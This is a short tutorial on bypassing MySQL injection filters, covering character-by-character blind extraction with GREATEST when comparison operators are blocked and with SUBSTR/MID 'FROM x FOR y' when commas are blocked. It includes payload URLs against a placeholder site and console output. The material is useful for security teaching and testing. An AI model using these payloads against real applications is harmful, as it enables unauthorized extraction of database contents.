There are many more bypass techniques for SQL injection; this article only summarizes a few simple ones.
The ideal injection point:
Supports UNION
Can produce errors (error-based injection)
Supports extras such as multi-statement execution, executing system commands, HTTP requests, etc.
If this is not the case, blind guessing (character by character) may be required. While guessing, you may run into some restrictions, and the attacker's job is then to work around them.
1. Using the GREATEST function when comparison operators are filtered
When guessing a single character, you typically use a binary search to find it.
mysql> select ascii(mid(user(),1,1)) < 150;
+------------------------------+
| ascii(mid(user(),1,1)) < 150 |
+------------------------------+
|                            1 |
+------------------------------+
The above checks whether the ASCII code of the first character of user() is less than 150. It returns true (1) if it is less than 150, otherwise false (0). You can see that this needs the comparison operators.
For example, with a boolean-based injection you would try:
http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) < 150
http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) >= 150
The content returned by the two pages above should differ.
The problem is that in some cases we cannot use the comparison operators (< and >) because they are filtered.
In that case, the GREATEST function can be used to bypass the filter. GREATEST(a, b) returns the larger of a and b.
When we want to check whether the ASCII code of the first character of user() is less than or equal to 150, use:
mysql> select greatest(ascii(mid(user(),1,1)),150)=150;
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),150)=150 |
+------------------------------------------+
|                                        1 |
+------------------------------------------+
If the ASCII code is less than or equal to 150, the expression above returns true.
2. Using the SUBSTR function when commas cannot be used
Cases where commas cannot be used are rarer; usually it is because the comma has some special meaning in the application and is handled separately.
The usual guessing payload uses a comma, because the MID function's arguments are comma-separated:
ascii(mid(user(),1,1)) = 150
The way to bypass this is to use the "FROM x FOR y" syntax, which is equivalent:
mid(user() from 1 for 1)
or
substr(user() from 1 for 1)
Both of the above also start at the first character and take one character.
So the injection payload, written without commas, becomes:
mysql> select ascii(substr(user() from 1 for 1)) < 150;
+------------------------------------------+
| ascii(substr(user() from 1 for 1)) < 150 |
+------------------------------------------+
|                                        1 |
+------------------------------------------+
This gives the same result as the MID version, without using a comma.
Filter bypass techniques for MySQL injections